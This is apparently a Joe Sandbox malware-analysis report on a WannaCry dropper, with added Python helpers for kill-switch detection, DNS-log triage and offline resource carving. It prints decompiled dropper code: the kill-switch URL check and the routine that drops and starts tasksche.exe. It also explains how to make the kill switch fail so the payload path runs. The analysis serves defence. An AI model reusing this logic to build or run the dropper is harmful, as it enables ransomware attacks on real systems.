0 | 192.168.2.3 | 49746 | 104.21.68.165 | 80 | C:\Users\user\Desktop\THN6clTA6P.exe
Timestamp | kBytes transferred | Direction | Data
Aug 31, 2022 23:46:49.084465981 CEST | 902 | OUT | GET / HTTP/1.1
Host: www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com
Cache-Control: no-cache
Aug 31, 2022 23:46:49.148341894 CEST | 903 | IN | HTTP/1.1 200 OK
          Date: Wed, 31 Aug 2022 21:46:49 GMT
          Content-Type: text/html;charset=UTF-8
          Content-Length: 113
          Connection: keep-alive
          x-sinkhole: sinkhole@blacklistthisdomain.com
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BwAJjUBV7QoBfDcQC5xHuwWf6HaSer5urPutgRH%2BIhWdxjAnZxQhv3Lj7wdnu2PPlKacdGr9jV%2FTSwi3vI%2BYOhYgTU0rv1q0jFccnc7tRao14EgvdRHCOJyooOZRF5g5vft43xf7R9Y9%2BZ3RRpCsAmuUjh5Fhtj03GcJjYsFDcilY2Vk"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 7438f608df147765-LHR
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 42 6c 61 63 6b 4c 69 73 74 54 68 69 73 44 6f 6d 61 69 6e 20 2d 20 53 69 6e 6b 68 6f 6c 65 3c 2f 68 31 3e 0a 20 20 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e
          Data Ascii: <!DOCTYPE html><body> <h1>BlackListThisDomain - Sinkhole</h1> <p>This domain has been sinkholed.</p></body>
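The session above is the whole network story of this run: one A lookup for the hard-coded domain, one GET with no User-Agent (the "HTTP GET or POST without a user agent" signature), and a 200 from a server that announces itself with an x-sinkhole header and a "sinkholed" HTML body, which is what the two Snort alerts (SIDs 2024293 and 2016803) key on. The following is an added example, not Joe Sandbox or Emerging Threats code, showing how the same indicators can be checked over captured HTTP and DNS data. REQUEST and RESPONSE are transcribed from this report's capture (response headers trimmed to the ones the checks read); the benign exchange is constructed for contrast. The `killswitch_outcome` branch is an inference from this report, not something the report states outright: the sinkhole answered, no files were dropped, only 3 functions executed, and the service-creation and resource-drop functions (OpenSCManagerA/CreateServiceA, FindResourceA/MoveFileExA) are listed as non-executed, which is consistent with the dropper exiting whenever the URL is reachable.

```python
"""Checks for the kill-switch request and sinkhole reply shown in the capture.

Added example, not Joe Sandbox or Emerging Threats code. REQUEST/RESPONSE are
transcribed from this report; the benign pair is constructed.
"""

KILLSWITCH_DOMAIN = "www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com"
ET_SID = {  # the two Snort SIDs listed in this report, keyed by the indicator they fire on
    "wannacry_killswitch_domain": 2024293,   # ET TROJAN Possible WannaCry DNS Lookup 2
    "sinkhole_response_header": 2016803,     # ET TROJAN Known Sinkhole Response Header
}


def parse_http(raw):
    """Split one raw HTTP/1.x message into (start line, {lowercased header: value}, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def analyse_exchange(request, response):
    """Indicators raised for one request/response pair (a set of tag strings)."""
    req_line, req_h, _ = parse_http(request)
    _, resp_h, body = parse_http(response)
    hits = set()
    if req_line.startswith("GET ") and "user-agent" not in req_h:
        hits.add("http_get_without_user_agent")      # bare WinINet request, as in the capture
    if req_h.get("host", "").lower() == KILLSWITCH_DOMAIN:
        hits.add("wannacry_killswitch_domain")
    if "x-sinkhole" in resp_h:
        hits.add("sinkhole_response_header")
    if b"sinkhole" in body.lower():
        hits.add("sinkhole_page_body")
    try:                                              # truncated capture: body checks are unreliable
        if int(resp_h.get("content-length", len(body))) != len(body):
            hits.add("body_length_mismatch")
    except ValueError:
        hits.add("body_length_mismatch")
    return hits


def related_et_sids(hits):
    """Snort SIDs from the report that correspond to the raised indicators."""
    return {ET_SID[h] for h in hits if h in ET_SID}


def killswitch_outcome(response):
    """Dropper branch inferred from this run: any HTTP reply (status not checked,
    InternetOpenUrlA returns a handle either way) means the process exits; no reply
    means the service-install / resource-drop path runs."""
    return "exit" if response.startswith(b"HTTP/") else "install-service"


def is_killswitch_lookup(qname):
    """DNS-side counterpart: the A query the first Snort rule fires on."""
    return qname.rstrip(".").lower() == KILLSWITCH_DOMAIN


# Transcribed from this report's HTTP session (headers trimmed).
REQUEST = (b"GET / HTTP/1.1\r\n"
           b"Host: www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com\r\n"
           b"Cache-Control: no-cache\r\n\r\n")
RESPONSE = (b"HTTP/1.1 200 OK\r\n"
            b"Date: Wed, 31 Aug 2022 21:46:49 GMT\r\n"
            b"Content-Type: text/html;charset=UTF-8\r\n"
            b"Content-Length: 113\r\n"
            b"Connection: keep-alive\r\n"
            b"x-sinkhole: sinkhole@blacklistthisdomain.com\r\n"
            b"Server: cloudflare\r\n\r\n"
            b"<!DOCTYPE html>\n<body>\n  <h1>BlackListThisDomain - Sinkhole</h1>\n"
            b"  <p>This domain has been sinkholed.</p>\n</body>")
# Constructed benign exchange for contrast.
BENIGN_REQUEST = b"GET / HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
BENIGN_RESPONSE = b"HTTP/1.1 200 OK\r\nContent-Length: 18\r\n\r\n<html>hello</html>"

if __name__ == "__main__":
    hits = analyse_exchange(REQUEST, RESPONSE)
    print(sorted(hits), sorted(related_et_sids(hits)), killswitch_outcome(RESPONSE))
```

The practical caveat for anyone reproducing this analysis: because the domain is sinkholed and reachable, a sandbox with live Internet sees only the kill-switch branch. To observe the service installation and the resource drop, the domain has to be made unreachable (no DNS answer or a refused connection), and the run should be expected to look very different from this report.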


          Target ID:1
          Start time:23:46:47
          Start date:31/08/2022
          Path:C:\Users\user\Desktop\THN6clTA6P.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\THN6clTA6P.exe"
          Imagebase:0x400000
          File size:3723293 bytes
          MD5 hash:3983F0EBEEC88B8005724A203AE27180
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmp, Author: Joe Security
          • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000000.262463921.000000000040F000.00000008.00000001.01000000.00000005.sdmp, Author: Joe Security
          • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000001.00000000.262558061.0000000000710000.00000002.00000001.01000000.00000005.sdmp, Author: us-cert code analysis team
          • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmp, Author: us-cert code analysis team
          Reputation:low


            Execution Graph

            Execution Coverage:2.5%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:19.2%
            Total number of Nodes:323
            Total number of Limit Nodes:5
[Execution graph node/edge dump (323 nodes, 5 limit nodes) omitted. Call chains recoverable from it:
- 0x409a16 (CRT startup: __set_app_type, __p__fmode, __p__commode, _controlfp, _initterm, __getmainargs, GetStartupInfoA, GetModuleHandleA) -> 0x408140 InternetOpenA, InternetOpenUrlA -> InternetCloseHandle x2 -> either 0x409b4a exit, _XcptFilter, or 0x408090 GetModuleFileNameA, __p___argc -> OpenSCManagerA -> OpenServiceA -> 0x407fa0 ChangeServiceConfig2A / CloseServiceHandle -> StartServiceCtrlDispatcherA; 0x407f20 -> 0x407c40 sprintf, OpenSCManagerA, CreateServiceA, StartServiceA, CloseServiceHandle -> 0x407ce0 GetModuleHandleW, GetProcAddress x4, FindResourceA, LoadResource, LockResource, SizeofResource, sprintf x2, MoveFileExA.
- Service entry 0x408000 RegisterServiceCtrlHandlerA -> SetServiceStatus -> 0x407bd0 -> 0x407b90 WSAStartup -> 0x407620 CryptAcquireContextA, InitializeCriticalSection -> 0x407a20 GlobalAlloc, CreateFileA, GetFileSize, ReadFile, CloseHandle, GlobalFree -> two _beginthreadex loops with CloseHandle and Sleep; 0x408079 Sleep, ExitProcess on failure; 0x407f30 SetServiceStatus.
- 0x407720 -> 0x409160 GetAdaptersInfo, LocalAlloc, GetPerAdapterInfo, inet_addr, htonl (helpers 0x408e50, 0x4090d0, 0x409110, 0x409329, 0x409470 ??2@YAPAXI), LocalFree -> per-address _beginthreadex, InterlockedIncrement, CloseHandle, Sleep, _endthreadex.
- 0x407840 GetTickCount -> 0x407660 rand / EnterCriticalSection, CryptGenRandom, LeaveCriticalSection -> sprintf, inet_addr -> 0x407480 htons, socket, ioctlsocket, connect, select, closesocket -> _beginthreadex, WaitForSingleObject, TerminateThread, CloseHandle, Sleep; 0x4076b0 is the same connect-then-thread pattern ending in InterlockedDecrement, _endthreadex.
- 0x407540 inet_ntoa, strncpy -> 0x401980 / 0x401b70 / 0x4072a0: inet_addr, htons, socket, connect, then alternating send/recv (0x4017b0 sprintf; 0x406f50 GlobalAlloc, htons, 0x406f00 send, recv, GlobalFree), closesocket, Sleep, _endthreadex.
- 0x401370 GetTickCount -> 0x401660 QueryPerformanceFrequency, QueryPerformanceCounter, Sleep -> inet_addr, htons, socket, connect, send, recv, _stricmp x2, closesocket, 0x401310 closesocket, Sleep (allocation helpers 0x408390, 0x4082c0, 0x4085d0, 0x4089d0: ??2@YAPAXI, _Lockit, free).
- 0x401000 / 0x401040 -> 0x408200 ??2@YAPAXI, ??0_Lockit, ??1_Lockit, free; 0x409816 _onexit / __dllonexit; 0x409b68 _exit; 0x4081d0 free.]

            Callgraph

            • Executed
            • Not Executed
            • Opacity -> Relevance
            • Disassembly available

            Callgraph (rendered figure; node and edge list omitted). Nodes are Function_00401000 through Function_00409BC0. Edges recoverable from the list: 00409A16 -> 00408140 -> 00408090 -> {00407F20, 00407FA0}; 00407F20 -> {00407C40, 00407CE0}; 00408000 -> 00407BD0 -> 00407B90 -> {00407620, 00407A20}; 00407720 -> {00409160, 004097FE}; 00409160 -> {00408E50, 004090D0, 00409750, 00409470, 00409680, 00409110}; 004076B0 -> 00407480; 00407840 -> {00407660, 00407480}; 00407540 -> {00401370, 00401B70, 00401980, 004072A0}; 004072A0 -> {00406ED0, 00406F50, 00406EB0}.

            Control-flow Graph

            C-Code - Quality: 71%
            			_entry_(void* __ebx, void* __edi, void* __esi) {
            				CHAR* _v8;
            				intOrPtr* _v24;
            				intOrPtr _v28;
            				struct _STARTUPINFOA _v96;
            				int _v100;
            				char** _v104;
            				int _v108;
            				void _v112;
            				char** _v116;
            				intOrPtr* _v120;
            				intOrPtr _v124;
            				void* _t27;
            				intOrPtr _t36;
            				signed int _t38;
            				int _t40;
            				intOrPtr* _t41;
            				intOrPtr _t42;
            				intOrPtr _t49;
            				intOrPtr* _t55;
            				intOrPtr _t58;
            				intOrPtr _t61;
            
            				_push(0xffffffff);
            				_push(0x40a1a0);
            				_push(0x409ba2);
            				_push( *[fs:0x0]);
            				 *[fs:0x0] = _t58;
            				_v28 = _t58 - 0x68;
            				_v8 = 0;
            				__set_app_type(2);
            				 *0x70f894 =  *0x70f894 | 0xffffffff;
            				 *0x70f898 =  *0x70f898 | 0xffffffff;
            				 *(__p__fmode()) =  *0x70f88c;
            				 *(__p__commode()) =  *0x70f888;
            				 *0x70f890 = _adjust_fdiv;
            				_t27 = E00409BA1( *_adjust_fdiv);
            				_t61 =  *0x431410; // 0x1
            				if(_t61 == 0) {
            					__setusermatherr(E00409B9E);
            				}
            				E00409B8C(_t27);
            				_push(0x40b010);
            				_push(0x40b00c);
            				L00409B86();
            				_v112 =  *0x70f884;
            				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
            				_push(0x40b008);
            				_push(0x40b000); // executed
            				L00409B86(); // executed
            				_t55 =  *_acmdln;
            				_v120 = _t55;
            				if( *_t55 != 0x22) {
            					while( *_t55 > 0x20) {
            						_t55 = _t55 + 1;
            						_v120 = _t55;
            					}
            				} else {
            					do {
            						_t55 = _t55 + 1;
            						_v120 = _t55;
            						_t42 =  *_t55;
            					} while (_t42 != 0 && _t42 != 0x22);
            					if( *_t55 == 0x22) {
            						L6:
            						_t55 = _t55 + 1;
            						_v120 = _t55;
            					}
            				}
            				_t36 =  *_t55;
            				if(_t36 != 0 && _t36 <= 0x20) {
            					goto L6;
            				}
            				_v96.dwFlags = 0;
            				GetStartupInfoA( &_v96);
            				if((_v96.dwFlags & 0x00000001) == 0) {
            					_t38 = 0xa;
            				} else {
            					_t38 = _v96.wShowWindow & 0x0000ffff;
            				}
            				_push(_t38);
            				_push(_t55);
            				_push(0);
            				_push(GetModuleHandleA(0));
            				_t40 = E00408140();
            				_v108 = _t40;
            				exit(_t40); // executed
            				_t41 = _v24;
            				_t49 =  *((intOrPtr*)( *_t41));
            				_v124 = _t49;
            				_push(_t41);
            				_push(_t49);
            				L00409B80();
            				return _t41;
            			}

            (Side-by-side instruction address column for the listing above, 0x00409a19 to 0x00409b67, omitted.)

            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
            • String ID:
            • API String ID: 801014965-0
            • Opcode ID: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
            • Instruction ID: f220c78e044b43db95b39954543cb8470338bddc8e57b6bf74c51ec52977e19a
            • Opcode Fuzzy Hash: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
            • Instruction Fuzzy Hash: AF415E71800348EFDB24DFA4ED45AAA7BB8FB09720F20413BE451A72D2D7786841CB59
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 74%
            			E00408140() {
            				char* _v1;
            				char* _v3;
            				char* _v7;
            				char* _v11;
            				char* _v15;
            				char* _v19;
            				char* _v23;
            				void _v80;
            				char _v100;
            				char* _t12;
            				void* _t13;
            				void* _t14;
            				void* _t28;
            				void* _t30;
            
            				_t12 = memcpy( &_v80, "http://www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com", 0xe << 2);
            				asm("movsb");
            				_v23 = _t12;
            				_v19 = _t12;
            				_v15 = _t12;
            				_v11 = _t12;
            				_v7 = _t12;
            				_v3 = _t12;
            				_v1 = _t12;
            				_t13 = InternetOpenA(_t12, 1, _t12, _t12, _t12); // executed
            				_t30 = _t13;
            				_t14 = InternetOpenUrlA(_t30,  &_v100, 0, 0, 0x84000000, 0); // executed
            				_t28 = _t14;
            				_push(_t30);
            				if(_t28 != 0) {
            					InternetCloseHandle(); // executed
            					InternetCloseHandle(_t28);
            					return 0;
            				} else {
            					InternetCloseHandle();
            					InternetCloseHandle(0);
            					E00408090();
            					return 0; // executed
            				}
            			}

            (Side-by-side instruction address column for the listing above, 0x00408155 to 0x004081b9, omitted.)

            APIs
            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
            • InternetCloseHandle.WININET(00000000), ref: 004081A7
            • InternetCloseHandle.WININET(00000000), ref: 004081AB
              • Part of subcall function 00408090: GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
              • Part of subcall function 00408090: __p___argc.MSVCRT ref: 004080A5
            • InternetCloseHandle.WININET(00000000), ref: 004081BC
            • InternetCloseHandle.WININET(00000000), ref: 004081BF
            Strings
            • http://www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com, xrefs: 0040814A
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: Internet$CloseHandle$Open$FileModuleName__p___argc
            • String ID: http://www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com
            • API String ID: 2010709392-3122308260
            • Opcode ID: ec133b43de4331460eff2a0b2c8cd404513b79e1c5a5deea9d12a904249ad51c
            • Instruction ID: e18cae5e57e59901b1837d80ae8654563a660de2be6bc36b6f573cb3739cdf66
            • Opcode Fuzzy Hash: ec133b43de4331460eff2a0b2c8cd404513b79e1c5a5deea9d12a904249ad51c
            • Instruction Fuzzy Hash: AB0175719043206EE310EF749C01BAF7BE9EF85750F01042FF984E6280EAB5981487A7
            Uniqueness

            Uniqueness Score: -1.00%
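E00408140 above is the kill-switch check: a direct HTTP GET to the URL in the listing, exit if InternetOpenUrlA returns a handle, otherwise fall through to E00408090. The triage script below is an added example, not part of the Joe Sandbox report or of the sample. It reads DNS query logs in a four-field format constructed for this example (timestamp, client, query name, rcode) and reports, per client, whether the kill-switch lookup failed (so the sample certainly continued) or resolved (so the HTTP GET decided the outcome and proxy or firewall logs need checking).

```python
"""
Triage helper for the kill-switch logic in E00408140.  The sample exits only
when InternetOpenUrlA on the URL below succeeds; a failed lookup means the GET
could not succeed and the sample went on to E00408090 (service install).
Added example, not code from the sample or the sandbox report.
Log format (constructed for this example): "<timestamp> <client_ip> <qname> <rcode>".
"""

KILL_SWITCH_HOST = "www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com"

def _normalize(qname):
    """Case-fold and drop the trailing dot that many resolvers log."""
    return qname.rstrip(".").lower()

def _is_kill_switch_query(qname):
    return _normalize(qname) == KILL_SWITCH_HOST

def parse_dns_log(lines):
    """Yield (client_ip, qname, rcode) tuples; lines that are not four fields are skipped."""
    for line in lines:
        parts = line.split()
        if len(parts) != 4:
            continue
        _ts, client, qname, rcode = parts
        yield client, qname, rcode.upper()

def kill_switch_verdicts(lines):
    """
    Map each client that queried the kill-switch host to a verdict:
      "proceeded"  - lookup failed (NXDOMAIN/SERVFAIL/REFUSED...), so the GET could
                     not succeed and the sample continued into E00408090
      "check_http" - the name resolved; whether the sample exited depends on the
                     HTTP GET, so confirm in proxy or firewall logs
    A client with both outcomes keeps "proceeded": one failed attempt is enough
    for the payload path to have run.
    """
    verdicts = {}
    for client, qname, rcode in parse_dns_log(lines):
        if not _is_kill_switch_query(qname):
            continue
        if rcode == "NOERROR":
            verdicts.setdefault(client, "check_http")
        else:
            verdicts[client] = "proceeded"
    return verdicts

# Constructed sample log for this example, not sandbox output.
SAMPLE_LOG = [
    "2022-09-03T10:00:01Z 10.0.0.15 www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com. NXDOMAIN",
    "2022-09-03T10:00:03Z 10.0.0.22 WWW.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com NOERROR",
    "2022-09-03T10:00:05Z 10.0.0.22 www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com SERVFAIL",
    "2022-09-03T10:00:07Z 10.0.0.31 www.example.com NOERROR",
    "2022-09-03T10:00:09Z 10.0.0.40 www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com NOERROR",
    "malformed line that the parser skips",
]

if __name__ == "__main__":
    for client, verdict in sorted(kill_switch_verdicts(SAMPLE_LOG).items()):
        print(client, verdict)
```

Two details of the listing matter when reading such verdicts. InternetOpenA is called with dwAccessType 1, INTERNET_OPEN_TYPE_DIRECT, so the request ignores any configured proxy; on a network that only allows web egress through a proxy the GET fails even when the name resolves, and the sample continues into E00408090. The 0x84000000 flag word passed to InternetOpenUrlA is INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE, so a cached response cannot satisfy the check either.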

            Control-flow Graph

            • Executed
            • Not Executed
            Control-flow graph (rendered figure; block list omitted): block 409816-40981d branches to 40981f-40982a (_onexit) or 40982b-409841 (__dllonexit).
            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: __dllonexit_onexit
            • String ID:
            • API String ID: 2384194067-0
            • Opcode ID: 0781ed1b29e21d9fd6ecb5fca695af29cf14ef0124ca815a7394de4f342490fd
            • Instruction ID: 32c58c291263a65dfadb3e1ea53c98eec5aa450420fab8ef346d5ac4251156bf
            • Opcode Fuzzy Hash: 0781ed1b29e21d9fd6ecb5fca695af29cf14ef0124ca815a7394de4f342490fd
            • Instruction Fuzzy Hash: AAC0C971448301EACA246B10BC068D977A1E652736BA4C779F069309F1D7391864A506
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            Control-flow graph (rendered figure; block list omitted): 407ce0-407cfb GetModuleHandleW -> 407d01-407d43 GetProcAddress x4 -> null checks at 407d49, 407d55, 407d61 -> 407d69-407d7e FindResourceA -> 407d84-407d8e LoadResource -> 407d94-407da1 LockResource -> 407da7-407db3 SizeofResource -> 407db9-407e4e sprintf x2, MoveFileExA -> 407e54-407ef0 -> 407ef2-407f01; every failing check exits through 407f08-407f14.
            C-Code - Quality: 36%
            			E00407CE0() {
            				void _v259;
            				char _v260;
            				void _v519;
            				char _v520;
            				char _v572;
            				short _v592;
            				intOrPtr _v596;
            				void* _v608;
            				void _v636;
            				char _v640;
            				intOrPtr _v644;
            				intOrPtr _v648;
            				intOrPtr _v652;
            				char _v656;
            				intOrPtr _v692;
            				intOrPtr _v700;
            				_Unknown_base(*)()* _t36;
            				void* _t38;
            				void* _t39;
            				intOrPtr _t64;
            				struct HINSTANCE__* _t104;
            				struct HRSRC__* _t105;
            				void* _t107;
            				void* _t108;
            				long _t109;
            				intOrPtr _t121;
            				intOrPtr _t122;
            
            				_t104 = GetModuleHandleW(L"kernel32.dll");
            				if(_t104 != 0) {
            					 *0x431478 = GetProcAddress(_t104, "CreateProcessA");
            					 *0x431458 = GetProcAddress(_t104, "CreateFileA");
            					 *0x431460 = GetProcAddress(_t104, "WriteFile");
            					_t36 = GetProcAddress(_t104, "CloseHandle");
            					_t64 =  *0x431478; // 0x0
            					 *0x43144c = _t36;
            					if(_t64 != 0) {
            						_t121 =  *0x431458; // 0x0
            						if(_t121 != 0) {
            							_t122 =  *0x431460; // 0x0
            							if(_t122 != 0 && _t36 != 0) {
            								_t105 = FindResourceA(0, 0x727, "R");
            								if(_t105 != 0) {
            									_t38 = LoadResource(0, _t105);
            									if(_t38 != 0) {
            										_t39 = LockResource(_t38);
            										_v608 = _t39;
            										if(_t39 != 0) {
            											_t109 = SizeofResource(0, _t105);
            											if(_t109 != 0) {
            												_v520 = 0;
            												memset( &_v519, 0, 0x40 << 2);
            												asm("stosw");
            												asm("stosb");
            												_v260 = 0;
            												memset( &_v259, 0, 0x40 << 2);
            												asm("stosw");
            												asm("stosb");
            												sprintf( &_v520, "C:\\%s\\%s", "WINDOWS", "tasksche.exe");
            												sprintf( &_v260, "C:\\%s\\qeriuwjhrf", "WINDOWS");
            												MoveFileExA( &_v520,  &_v260, 1);
            												_t107 =  *0x431458( &_v520, 0x40000000, 0, 0, 2, 4, 0);
            												if(_t107 != 0xffffffff) {
            													 *0x431460(_t107, _v636, _t109,  &_v636, 0);
            													 *0x43144c(_t107);
            													_v652 = 0;
            													_v648 = 0;
            													_v644 = 0;
            													memset( &_v636, 0, 0x10 << 2);
            													asm("repne scasb");
            													_v656 = 0;
            													_t108 = " /i";
            													asm("repne scasb");
            													memcpy( &_v572 - 1, _t108, 0 << 2);
            													_push( &_v656);
            													memcpy(_t108 + 0x175b75a, _t108, 0);
            													_push( &_v640);
            													_push(0);
            													_push(0);
            													_push(0x8000000);
            													_push(0);
            													_push(0);
            													_push(0);
            													_push( &_v572);
            													_push(0);
            													_v640 = 0x44;
            													_v592 = 0;
            													_v596 = 0x81;
            													if( *0x431478() != 0) {
            														 *0x43144c(_v692);
            														 *0x43144c(_v700);
            													}
            												}
            											}
            										}
            									}
            								}
            							}
            						}
            					}
            				}
            				return 0;
            			}

            (Side-by-side instruction address column for the listing above, 0x00407cf5 to 0x00407f14, omitted.)

            APIs
            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,6FD8FB10,?,00000000), ref: 00407CEF
            • GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 00407D0D
            • GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00407D1A
            • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00407D27
            • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00407D34
            • FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
            • LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
            • LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
            • SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
            • sprintf.MSVCRT ref: 00407E01
            • sprintf.MSVCRT ref: 00407E18
            • MoveFileExA.KERNEL32 ref: 00407E2C
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: AddressProcResource$sprintf$FileFindHandleLoadLockModuleMoveSizeof
            • String ID: /i$C:\%s\%s$C:\%s\qeriuwjhrf$CloseHandle$CreateFileA$CreateProcessA$D$WINDOWS$WriteFile$kernel32.dll$tasksche.exe
            • API String ID: 4072214828-1507730452
            • Opcode ID: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
            • Instruction ID: 13a48b3e7e70fc1f7524b3ea2ca00aec236584d0bbebcf852995d03268f4a9c8
            • Opcode Fuzzy Hash: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
            • Instruction Fuzzy Hash: B15197715043496FE7109F74DC84AAB7B98EB88354F14493EF651A32E0DA7898088BAA
            Uniqueness

            Uniqueness Score: -1.00%
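E00407CE0 above resolves CreateProcessA, CreateFileA, WriteFile and CloseHandle through GetProcAddress, pulls resource type "R", ID 0x727 (1831) out of its own image, renames any existing C:\WINDOWS\tasksche.exe to C:\WINDOWS\qeriuwjhrf, writes the resource bytes to C:\WINDOWS\tasksche.exe and starts it. The Python below is an added example, not code from the sample or from the sandbox report: it performs the same FindResourceA / LoadResource / SizeofResource lookup offline against a raw .rsrc section, so the dropped executable can be carved without running anything. The .rsrc blob it builds is constructed for the demonstration; for a real sample the section bytes and RVA come from any PE parser or from the memory dump.

```python
"""
Offline equivalent of FindResourceA(0, 0x727, "R") / LoadResource /
LockResource / SizeofResource as used in E00407CE0.  Walks a raw PE .rsrc
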